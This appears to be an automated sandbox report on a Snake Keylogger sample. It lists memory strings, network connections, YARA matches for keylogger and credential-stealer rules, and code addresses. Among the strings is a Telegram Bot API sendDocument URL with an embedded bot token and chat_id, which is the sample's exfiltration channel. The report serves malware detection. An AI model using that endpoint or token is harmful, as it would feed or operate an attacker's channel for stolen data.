          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.fonts.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sakkal.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.tiro.com
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.typography.netD
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1713078916.0000000007432000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7572469755:AAHCBLe3bEv-r8VSlR3NztVSSHz6JBpCC7s/sendDocument?chat_id=7207
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000029F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.orgH
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002829000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.000000000286C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002829000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028BC000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.000000000286C000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002920000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.0000000002911000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028D7000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000002.00000002.4166196575.00000000028E5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
          Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49756 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 2.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4aec050.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a23810.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
          Source: 0.2.SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe.4a87c30.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000002.00000002.4165208883.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: 00000000.00000002.1710598493.00000000048EE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 2828, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
          Source: Process Memory Space: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe PID: 7184, type: MEMORYSTRMatched rule: Detects Snake Keylogger Author: ditekSHen
          .NET source code contains very large strings
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, Form4.csLong String: Length: 169248
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_0137E0440_2_0137E044
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_073FF0A90_2_073FF0A9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_073F0A800_2_073F0A80
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_073F0A700_2_073F0A70
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF54600_2_07BF5460
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF51700_2_07BF5170
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF0A200_2_07BF0A20
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BFC7000_2_07BFC700
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BFC6F10_2_07BFC6F1
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BFE5180_2_07BFE518
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF54510_2_07BF5451
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BFC2B80_2_07BFC2B8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF41B90_2_07BF41B9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF41F00_2_07BF41F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF41DF0_2_07BF41DF
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF51600_2_07BF5160
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BFBE900_2_07BFBE90
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BFAED90_2_07BFAED9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF2BF80_2_07BF2BF8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BFDB680_2_07BFDB68
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 0_2_07BF0A100_2_07BF0A10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDF0072_2_00DDF007
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDC1902_2_00DDC190
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DD61082_2_00DD6108
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDB3282_2_00DDB328
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDC4702_2_00DDC470
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDC7512_2_00DDC751
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DD67302_2_00DD6730
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DD98582_2_00DD9858
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DD4AD92_2_00DD4AD9
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDCA312_2_00DDCA31
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDBBD32_2_00DDBBD3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDBEB02_2_00DDBEB0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDB4F32_2_00DDB4F3
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DD35702_2_00DD3570
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDE5172_2_00DDE517
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_00DDE5282_2_00DDE528
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06589E782_2_06589E78
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658BE002_2_0658BE00
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06587EFA2_2_06587EFA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658B7B02_2_0658B7B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658C4482_2_0658C448
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658A4C02_2_0658A4C0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658DD292_2_0658DD29
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658AB102_2_0658AB10
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065800402_2_06580040
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065898302_2_06589830
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658B1602_2_0658B160
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065879102_2_06587910
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065891E02_2_065891E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065811A02_2_065811A0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06589E672_2_06589E67
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065836002_2_06583600
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06587F582_2_06587F58
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065847DA2_2_065847DA
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065847E82_2_065847E8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065867B02_2_065867B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065847B02_2_065847B0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065867A22_2_065867A2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06584C402_2_06584C40
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06586C082_2_06586C08
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658C4382_2_0658C438
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06584C302_2_06584C30
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065854F02_2_065854F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065854E22_2_065854E2
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065804982_2_06580498
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065804892_2_06580489
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065874B82_2_065874B8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658A4B62_2_0658A4B6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065874A82_2_065874A8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06580D482_2_06580D48
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06580D392_2_06580D39
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658BDFB2_2_0658BDFB
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06585D942_2_06585D94
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06585DA02_2_06585DA0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065862102_2_06586210
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065862202_2_06586220
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065843582_2_06584358
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065843682_2_06584368
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658AB022_2_0658AB02
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_06586BF82_2_06586BF8
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065870542_2_06587054
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065870602_2_06587060
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658001D2_2_0658001D
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065898202_2_06589820
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065808F02_2_065808F0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065808E02_2_065808E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065850982_2_06585098
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658508A2_2_0658508A
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_0658B1502_2_0658B150
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065859482_2_06585948
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065859422_2_06585942
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065829002_2_06582900
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065879002_2_06587900
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065891D62_2_065891D6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exeCode function: 2_2_065811912_2_06581191
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1710093134.000000000320C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1709088113.00000000011AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000002.1714572943.000000000BAC0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
          Source: SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe, 00000000.00000000.1679535744.0000000000BD6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameJcWm.exeF vs SecuriteInfo.com.Win32.MalwareX-gen.10909.3543.exe
